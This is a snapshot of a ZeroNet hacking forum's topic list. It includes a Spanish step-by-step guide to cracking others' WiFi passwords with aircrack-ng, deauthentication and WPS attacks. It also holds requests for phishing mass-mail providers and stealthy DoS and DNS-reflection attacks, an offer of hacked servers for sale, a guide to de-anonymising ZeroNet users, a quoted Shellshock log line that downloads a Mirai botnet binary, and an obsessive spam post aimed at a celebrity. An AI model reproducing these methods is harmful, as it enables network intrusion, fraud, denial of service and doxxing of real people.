? Editing: Post:21.body Save Delete Cancel
More

Newest topics

Follow in NewsfeedFollowing
+ Create new topic

Title

Body
^1 ^2 added ━ submitted by user_name

Encrypt your ZeroNet Directory

For those of you who are particularly paranoid about security it would be a good idea to use Vera Crypt to encrypt your ZeroNet files when your not using them. That way if your machine is apprehended it won't be possible to see what sites you have visited.
^5 ^6 8 comment last on Jun 29, 2019 ━ submitted by absolutettruth

Metodología -- Obtener passwords de redes WiFi

# 0: requirements Tener `GNU/Linux` con drivers de placa de red _patcheados_ para poder inyectar paquetes. Mi recomendación es correr `Kali Linux`, una distribución que ya posee esto y las aplicaciones de la suite `aircrack-ng` además de otro montón de herramientas de _pentest_. Hasta donde entiendo, el asunto de _drivers patcheados_ depende de si queremos ejecutar la metodología 'activa' (aparece en el final del segundo paso y es optativa para ganar tiempo). Salvo el último paso, el primero y el segundo hay que hacerlos estando cerca del _target_ y para eso recomiendo usar cualquier netbook vieja (x86) o incluso una tablet (ARM) ya que si se opta por la metodología pasiva puede demorar horas/días y lo mejor es dejar todo ahí y olvidarse durante ese tiempo hasta que aparece en la pantalla `HANDSHAKE CAPTURED`. Eso es la información de la clave que básicamente circula encriptada por el aire y es lo que después pasaremos a _crackear_ (romper). # 1: airmon-ng Hay que terminar todos los procesos que tengan en uso la placa de red (por ej. _NetworkManager_). Para eso corremos `airmon-ng check kill`. Luego, es necesario identificar el nombre de la interfaz con `ifconfig` (normalmente aparecen loopback y **wlan0**). Para cerrar estos primeros pasos, cabe mencionar que podemos utilizar `macchanger -r wlan0` para _spoofear_ la dirección MAC de nuestra placa y evitar ser identificados si elegimos algun método activo (es decir, enviamos paquetes hacia el _target_) hacia el final del segundo paso con el fin de acelerarlo. Iniciamos la interfaz de placa de red en modo monitor con `airmon-ng start wlan0`. Se va a crear una nueva interfaz con el mismo nombre y el sufijo **mon** de monitor. Empezamos el scaneo de redes ahora con `airodump-ng --wps wlan0mon`. Idealmente vamos a buscar una red que tenga señal (PWR) mínima de **-75**. Una vez que hayamos elegido una fila lo mejor es parar el scaneo con `CTRL+C` para evitar que sigan moviéndose ya que están constantemente siendo ordenadas según su señal. Pueden probar distintos lugares para obtener mayor señal con cierto _target_. Entre los datos que proporciona cada columna lo que necesitamos es el _channel_ y la _BSSID del AP_, recomiendo anotarlos en algún papel. Elijan un _target_ fácil para empezar, el grado de vulnerabilidad en forma decreciente sería WPS > WEP >> WPA. # 2: airodump-ng Para terminar esta primera etapa, hay que ejecutar `airodump-ng -c $channel -w $nombre --bssid $APbssid wlan0mon` dónde las _$variables_ son estos datos que anotamos y $nombre es el prefijo usado para los archivos con info de _captura_ que se generarán (en el directorio de trabajo actual). Ahora queda esperar a juntar suficientes _beacons_, normalmente alcanza con un fin de semana entero y es algo que depende de muchas cosas pero principalmente será la señal (PWR) y el uso de la red por parte de los clientes que se autentifican correctamente en ella. Cuando haya finalizado, arriba a la derecha aparecerá un mensaje que indica _handshake_ capturado. ## aireplay-ng Sirve para acelerar este proceso que puede demorar horas/días. Acceder a otra shell. Si se trata de una red con encriptación WEP, basta usar `aireplay-ng -1 0 -a $APbssid wlan0mon` y `aireplay-ng -3 -b $APbssid wlan0mon`. Si se trata de una WPA 1 o 2, `aireplay-ng -0 3 -a $APbssid -c $clientMAC wlan0mon`. Lo que hacen estos porgramas y parámetros es enviar señales para desconectar los clientes. En el ultimo caso, hay que indicar específicamente la MAC del cliente que podemos ver conectado a dicha red (aparece en el listado de _airodump-ng_) ## WPS De haber encontrado un router con WPS encendido lo primero que diría es que no sea una impresora, pero asumo que ya lo han chequeado, asique `reaver -i wlan0mon -b $APbssid -vv`. # 3: aircrack-ng Acá varía según que método de encriptación use nuestra red _target_. En estos comandos vuelvo a usar la nomenclatura de _$variables_ que ya deberían haber entendido del paso anterior. Pero se suma el diccionario para los casos de encriptación más fuerte (WPA). ### WEP `aircrack-ng $file.cap` ### WPA 1 y 2 `aircrack-ng -w $diccionario.txt $file.cap` El punto del diccionario es toda una historia aparte. Por mi parte me ha resultado provechoso entender que las compañias (_ISP_) utilizan un formato para las claves, que puede ser algo así como `nombreCompañia-#` con algún numero variable de dígitos. Para conocer estos patrones basta mirar un rato alguno de sos **mapas de WiFi** que proporcionan las aplicaciones de _Play Store_. Algunas incluso no usan números al azar sino que utilizan el ID nacional del dueño de la red, con lo cual se identifica un patrón o se acota desde qué nro. hasta cuál ir dentro de esas _N_ cifras. Normalmente me han resultado diccionarios de 10-30 mb que en una laptop moderna se consume en ~20 minutos. Para generar los diccionarios alcanza con un _loop_ en tu lenguaje de programación de preferencia y no voy a decir cómo porque son una decena de carácteres que a cualquier ser humano alfabetizado informáticamente debería resultarle obvio. Learn to code. ## [REPOST DE MI BLOG](http://127.0.0.1:43110/17TKQQZw9UatwxxwmUo2TVe1aEdWMmknwp/)
http://127.0.0.1:43110/17TKQQZw9UatwxxwmUo2TVe1aEdWMmknwp/
^1 ^2 1 comment last on Jun 23, 2019 ━ submitted by shadowspeed

HackingOS

"Kali linux" vs "Parrot Security" vs "Backbox" vs "Other" What is your favorite ?
^2 ^3 10 comment last on Jun 20, 2019 ━ submitted by s5gmentati00n

were you enter in Tor?

^1 ^2 4 comment last on Apr 10, 2019 ━ submitted by zoe00

icloud remote help

icloud locked iPhone se can't use is there any way to bypass it
^1 ^2 0 comments on Feb 17, 2019 ━ submitted by ghostss

Hacking in Linux

Everything about how to hack in Linux
^5 ^6 10 comment last on Feb 02, 2019 ━ submitted by riccardo

Bulk emails, spam, email bomb

I need to spread a phishing, I want to use software for mass mailing (sender deluxe) but I can not get a provider that accepts, eg gmail limits in 6000 emails per month, others do not send, someone knows a provider for this type of thing?
^1 ^2 0 comments on Jan 25, 2019 ━ submitted by dractor

Emails em massa, spam, email bomba

Preciso espalhar um phishing, quero usar um software para envios de email em massa (Email sender deluxe) porem nao consigo um provedor que aceite, ex: o gmail limita em 6000 emails por mes, outros nem enviam, alguem sabe um provedor para esse tipo de coisa?
^1 ^2 0 comments on Jan 25, 2019 ━ submitted by dractor

VPN

Any recommendation about a trustable VPN
^6 ^7 24 comment last on Dec 17, 2018 ━ submitted by momotaro

Shadow Broker tools dump

Anyone know where to access the tools dump?
^3 ^4 2 comment last on Dec 17, 2018 ━ submitted by threebagsfull

hacking

guys , someone can give me hacking site on zero net please i use backtrack 5r3
^1 ^2 6 comment last on Sep 15, 2018 ━ submitted by makira

zero

a zero net é perigosa ? Is zero net dangerous?
^1 ^2 3 comment last on Aug 12, 2018 ━ submitted by batataclan

There will be no one above skiddie-level talking here.

I guarantee it.
^5 ^6 12 comment last on Aug 12, 2018 ━ submitted by anomie

HACKED SERVERS FOR SALE

Cost: 50$ EACH Delivery items: 10 servers with ssh access *Use at your own risk* You can also contact me at hawkeyehere@protonmail.com
^1 ^2 0 comments on May 18, 2018 ━ submitted by hawk3y3

Any DoS toolkit/suite

Hello, can You advise any software that combine multiple DoSing tools for causing a webhosting server be overloaded or stop responding? | As a web server admin, i am looking for the DoSing suite for n00bs who can run the DoS very effectively (not being easily detected by average destination server firewall) without getting quickly blocked by the target server. Any suite that detects best attack method automatically? | Note that DoS may be criminal activity: https://en.wikipedia.org/wiki/Denial-of-service_attack#Legality | Links: [Slowloris & hammer.py](http://127.0.0.1:43110/big.kopykate.bit/?Video=1517454854_19WW28sn46rz9h15xf6NCELPdzxZ2YhbyB) [DoS questions](http://127.0.0.1:43110/hackertalk.bit/?Topic:5_1L4dZcDF2maSKHDy788yhxpYnBWnXadUtS/DoS+)
https://en.wikipedia.org/wiki/Denial-of-service_attack#Legality
^1 ^2 6 comment last on Apr 16, 2018 ━ submitted by ssdifnskdjfnsdjk

DoS questions

Hello, i have several questions regarding Denial of service kind of computer attack. I appreciate answers and thank in advance for them. 1. How to discover maximum number of connections i can establish during an DoS at a time not to get banned? Example my server limit is 190 connections and then IP gets banned in firewall for some time. Which linux commands do you recommend to discover best connection count to establish to a remote server (which firewall configuration is unknown)? Or any estimate you can advise per port? 2. Which port is usually most vulnerable and least restricted by firewall rules when it comes to a web servers? And which kind of attack is recommended to have highest impact when the attacker has only 1-3 low bandwidth servers (1-3 IPs only). Which connections frequency do you advise? 3. How would you compare effectiveness of the ICMP vs TCP vs UDP kind of attack? 4. Is it still effective to attack the way that you send large packets, which highest size is reasonable and what is the Linux command to discover if size is not too large for a remote server? 5. Which kind/s of DoS attack/s is/are hardest to be detected/discovered cause while this attack still having substantial impact on the destination web server 6. What is the best way to prepare and launch DNS reflection attack using list of open resolvers? Thank you
^1 ^2 0 comments on Feb 28, 2018 ━ submitted by ssdifnskdjfnsdjk

[E-Book] 8 Kali Linux Hacking and Pentesting Books

For those who want to learn more about this OS and other things... Reply to this if you want the Books
^12 ^13 24 comment last on Feb 20, 2018 ━ submitted by opbot

Which e-mail service for personal mailbox? (clearnet facing)

Hello, on Zeronet one can use http://127.0.0.1:43110/Mail.ZeroNetwork.bit on Tor, one can use: http://mail2tor2zyjdctd.onion - Mail2Tor (mail2tor.com) http://lelantoss7bcnwbv.onion - Lelantos (lelantos.org) not free http://bitmailendavkbec.onion - BitMessage (bitmessage.ch) http://sigaintevyh2rzvw.onion - SIGAINT (sigaint.org) (mentioned Tor mailboxes offers clearnet facing e-mail addresses and greater anonymity) Which e-mail service do you suggest? I need: - stable maybe 50 years into future, not depending on single person - SMTP (<10 e-mails daily), POP3 - simple to setup, can unsubscribe from all correspondence from them Thx
http://127.0.0.1:43110/Mail.ZeroNetwork.bit
^3 ^4 1 comment last on Jan 31, 2018 ━ submitted by ssdifnskdjfnsdjk

Should i allow Java in firewall?

Hello, i seen that the [I2P application](https://geti2p.net/en/) is using Java and my Firewall (Comodo) ask me too many times to allow the connection. And i do not know if it is good idea (security wise) to automaticaly allow all future Java requests. Because if there is any virus that will use Java i will not be prompted and will not spot such sudden Java connection. Or there is too low or no probability any malicious software will use Java to send out my private data?
https://geti2p.net/en/
^1 ^2 2 comment last on Jan 30, 2018 ━ submitted by ssdifnskdjfnsdjk

Apache log entry meaning, executing bot

Hello, do You know the meaning of this Apache access log entry please? 162.241.240.66 - - [25/Nov/2017:05:04:18 -0500] "GET / HTTP/1.1" 200 11783 "-" "() { :; }; /bin/sh -c 'wget http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;curl http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin;fetch -/dev/null http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin'" - Here i split it to newlines: /bin/sh -c ' wget http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null wget1 http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null curl http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null /usr/sfwbin/wget http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin fetch -/dev/null http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin ' My guess is that someone (the IP is of a bluehost, like someone have web proxy on bluehost shared hosting or VPS) is downloading binary from an domainhere.gq and executing it on a computer which he is accessing? That is strange as i do not believe this can work and accessed computer (via apache) can execute such a command unless apache and php script is set the way to run system commands like /bin/sh ? It also does not look like an exploit URL. The URL is just a domain's index (GET / ) It rather looks to me that the visitor faked the UserAgent and used system commands in it, but not sure for what purpose as UA is not executed right? Thanks for the feedback in advance, i think it is interesting log entry
http://domainhere.gq/wp-admin?infect-cctv=mirai-botnet.bin
^1 ^2 0 comments on Dec 28, 2017 ━ submitted by ssdifnskdjfnsdjk

wordpress

we need to migrate large wordpress sites to ZeroNet how can we achieve this?
^2 ^3 5 comment last on Dec 24, 2017 ━ submitted by theunhivedmind

www.mileyquest.ml https://eugeneshickey.github.io/ https://eugeneshickey.keybase.pub/ http://fncuwbiisyh6ak3i.onion

www.mileyquest.ml https://eugeneshickey.github.io/ https://eugeneshickey.keybase.pub/ http://fncuwbiisyh6ak3i.onion MILEY THIS IS DATABASE OF YOU WE CAN ONLY SHOW YOU BUT YOU MUST DO THAT ALONE OTHERS CANT HELP YOU IF YOU WILL LIKE OTHERS IGNORING --IGNORANCE IS DANGERIT AND LIVE IN YOUR OWN WORLD BECAUSE IS EASIER --SEE WHAT YOU WANT SEE ISNT WHAT IS REAL--LIVE IN LIE AND DOING WHAT IS EASY NO WHAT YOU WANT DONT BE SCARED JUMP JUMP JUMP LET IT GO LET MILEY BE FREE THRUTH IS OUT THERE MILEY www.mileyquest.ml HACKER GAME MILEYS SECREAT ON END OF THE GAME DECODE DECRYPT IT SHARE IT HAPPY HALLOWEEN VALENTINE https://plus.google.com/108915884713932997001/posts/6fqjCQYfPj1 bored miley joking or right about miley if you want know right decrypt this hacker steganography encryption game send it to miley and very fast time is enemy miley dont have time every day have peoples acces to informations and are hidden before his owners help miley send it to her if you want save her before then ....... ............. miley how i can contact you what if i have information what you want for you what others hiding before you about your freedom want you want MILEY SEXUALITY IS HERE WANT U KNOW YOUR SEXUALITY SECRETS WORLD UNDERGROUND SCIENTISTS HACKERS GEEKS WE INVITING U CONTACT ME MILEY SEXUALITY IS HERE WANT U KNOW YOUR SEXUALITY SECRETS WORLD UNDERGROUND SCIENTISTS/HACKERS GEEKS WE INVITING U CONTACT ME IT ISNT ONLY ABOUT U DARKNET IS STIL ONLY TIP OF THE ICEBERG ;P WE WANT SHOW U US WORLD ;P YOUR IS TOO ;P MILEY WATCH YOUR BACK THINGS ARENT WHAT LOOK LIKE ANYBODY AROUND YOUR ISNT THAT WHAT YOU THINK PEOPLES HIDING BEFORE YOU MANY THINGS AND OTHERS LIVE IN OWN WORLD DONT KNOW DANGER SO CANT SEE IT OR THEY WANT BE FRIENDS SO SAYING AND DOING WHAT YOU WANT OR WHAT THINK IF IS BETTER BUT NOT BETTER FOR YOU FOR MILEY ANYBODY VERY CLOSE AROUND IS ....... YOU KNOW IT YOU FEEL IT ONLY YOU DONT WANT KNOW IT ITS WHY YOU LOOKING TO SIDE BUT IF YOU DONT DO WHAT YOU MUST YOU WILL IN PAIN ONLY PAIN ANXIENTY DARKNESS TOTAL DESTRUCTED YOU MUST BE FREE YOU WANT BE FREE ITS WHY YOU ARE WHY YOU DOING WHAT YOU DOING ITS WHAT YOU WANT TAKE IT TAKE WHAT YOU WANT WHAT YOU ARE THINGS WILL BETTER THINGS WILL GOOD YOU WILL OK MILEY :) ONLY DO IT CONTINUE DONT FAIL TO TRAP DONT LOSE YOUR FREEDOM BUT REMEMBER IF YOU FAIL YOU CAN RUN :) BECAUSE YOU ARE FREE NOBODY CAN COMMAND YOU :) WE CAN ONLY SHOW YOU UNHIDDEN WORLD WITHOUT LAYERS AND SHITS BUT LOOKING YOU MUST ALONE UNDERSTANDING AND KNOWING :) YOUR FREEDOM IS ENDLY HERE ALL WHAT YOU WANT IS HERE NEVER BE SCARED LOOK AT THAT NEVER BE SCARED ASKING IF YOU WANT ANYTHING TAKE IT TAKE WHAT IS YOUR AND WHAT OTHERS HIDING BEFORE YOU ITS ONLY YOUR BE BITCH BITTING ITS YOUR THING IF YOU WANT FRIEND HERE IS ONE MAYBE LAST BUT I WILL ALWAYS TALKING FACTS ALWAYS SAYING WHAT I THINK ALWAYS THINKING BY MYSELF I ALWAYS SAY WHAT I THINK NICE OR NOT ONLY COLD FACT HIDDEN FRIEND WAITING CURIOSITY IS AWESOME THING --THEIR ONLY CRIME WAS CURIOSITY-- WHO IS THIS ENTITY BEHIND THAT AND WHAT CAN KNOW WHAT KNOW AND ME NO WHAT CAN SAY TO ME UNHIDE TO ME NO FEAR AND JUMP WHAT YOU CAN LOSE IN CITY OF FALLING ANGELS :) LIKE WE ALL :) WE ALL ARE FALLING ANGELS DONT BE SCARED AND TALK TO ME YOU CAN SEE THINGS WEIRD THINGS ;P ALL WEIRD THINGS AND ENTITIES OF ENTIRE WORLD YOU CAN ASK ME IF YOU WANT ONLY BE FREE BE NAKED BE MILEY ;P BE FREE BE NAKED BE MILEY ;P
https://eugeneshickey.github.io/
^1 ^2 1 comment last on Dec 01, 2017 ━ submitted by 3f3f

zeronet perigosa ?

a zero net é perigosa ? Is zero net dangerous?
^1 ^2 3 comment last on Sep 14, 2017 ━ submitted by batataclan

Overclocking

Everything about hardware and overclocking
^2 ^3 4 comment last on Jul 14, 2017 ━ submitted by joczo11

Hello anybody come here?

^3 ^4 3 comment last on May 28, 2017 ━ submitted by beb

Methodology -- Find someone's trace in ZeroNet

If you want to find someone's trace, we should at least know his/her unique identity or identities. ### Preparation Before this, be sure you have synced lots of zeronet sites locally. Mine as many as you need. The more sites you synced the more information you will get. ### Find ID ## If has a site For example, here I tried a user on ZeroNet who created several sites and was very active to leave messages. His site is http://127.0.0.1:43110/just_a_domain.bit or http://127.0.0.1:43110/abcefghijklmnopqrstuvwxyz01234567 . On the top right corner of his page, we can find a button. Drag it to the left. And scroll down to the `site address`. Copy it and save it somewhere. Let's say "abcefghijklmnopqrstuvwxyz01234567" ## If has a comment What if he or she did not have a personal site yet. Now we still can get his unique zeroid by using debug tools in web browser, Chrome or Firefox or so, to check one's unique ID in HTML file. It could be ``` <span class="user_name" title="a_nickname@zeroid.bit: 16G12KKPN3X1NaWBUJKXJ16eGYAwsfP8qF" style="color: rgb(149, 166, 89);">a_nickname</span> ``` The `16G12KKPN3X1NaWBUJKXJ16eGYAwsfP8qF` is the unique ID for this user `a_nickname`. Let's go to your directory and search all things ### Find all traces about this ID ``` cd ZeroBundle/ZeroNet/data grep "16G12KKPN3X1NaWBUJKXJ16eGYAwsfP8qF" ./ -R ``` Now we will find there could be lots of useful information about that user. ### Analysis Go to one of those directories and check the content of `data.json` and `content.json`. Try to figure out what he or she was talking about and the unique zeroid or so. It contains lots of information. The more information someone leaves, the easier he or she will be found. #### Happy hacking!
http://127.0.0.1:43110/just_a_domain.bit
^18 ^19 14 comment last on Jan 10, 2017 ━ submitted by riccardo

Surface 4 UEFI Password

I am trying to get passed the UEFI Admin Password to access UEFI settings. Any suggestions?
^1 ^2 0 comments on Apr 04, 2017 ━ submitted by thetraveler

First post

No really, this is the first post.
^2 ^3 3 comment last on Oct 23, 2016 ━ submitted by doublec

Where to start ?

What unix toys i can use to play around and snoop for info, without causing any damage to myself and others, not looking for tuts about how to hack someone at all ? Any pointers into what i should look for and where to get info ( seems there is a book about google search magic around ) ? A novice python dabbler here, be gentle.
^2 ^3 2 comment last on Oct 03, 2016 ━ submitted by vivisect

Uncensored git server possible?

Or do we have to use ipfs for that?
^5 ^6 3 comment last on Sep 18, 2016 ━ submitted by example

Custom Zeronet site creation

Discussion about creating custom sites on Zeronet (cause cloning is gay)
^2 ^3 1 comment last on Sep 09, 2016 ━ submitted by joczo11

Generating a new ZeroID - Error while during request: Forbidden Please try again later.

Anyone else getting this error? I've created an ID, then I move it away, restart ZeroNet, then go to ZeroID type in my new name for the ID and I get: "Error while during request: Forbidden Please try again later." anyone experiencing this issue?
^2 ^3 2 comment last on Jul 26, 2016 ━ submitted by arm

Create unmasker for 0chan?

We should create a chrome plugin that displays the name of every user
^2 ^3 0 comments on Jul 13, 2016 ━ submitted by arm

[CVE-2016-1039] Adobe Reader and Acrobat allow attackers to bypass JavaScript API execution restriction

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1039 Adobe Reader and Acrobat before 11.0.16, Acrobat and Acrobat Reader DC Classic before 15.006.30172, and Acrobat and Acrobat Reader DC Continuous before 15.016.20039 on Windows and OS X allow attackers to bypass JavaScript API execution restricti ...
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-1039
^2 ^3 0 comments on May 12, 2016 ━ submitted by riccardo

[CVE] 0day Microsoft Windows Zero-Day Local Privilege Escalation

News: https://threatpost.com/microsoft-zero-day-exposes-100-companies-to-pos-attack/118026/ In short: The kernel-mode driver in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, and Windows 10 Gold and 1511 allows local users to gain privileges via a crafted application, aka "Win32k Elevation of Privilege Vulnerability," a different vulnerability than CVE-2016-0143 and CVE-2016-0165. https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0167 ### How it is escalated in detail?
https://threatpost.com/microsoft-zero-day-exposes-100-companies-to-pos-attack/118026/
^2 ^3 0 comments on May 11, 2016 ━ submitted by riccardo

Main ZeroNet news How did you find ZeroNet?

Follow in NewsfeedFollowing

Title

Body
^? ^0 username posted added
Please sign innew comment
Sign in as...
Submit comment
You are running out of your allowed space, please contact the site's admin at unknown to raise your limit.
user_nameadded ^1 ^2
Reply
Body
More comments
This page is a snapshot of ZeroNet. Start your own ZeroNet for complete experience. Learn More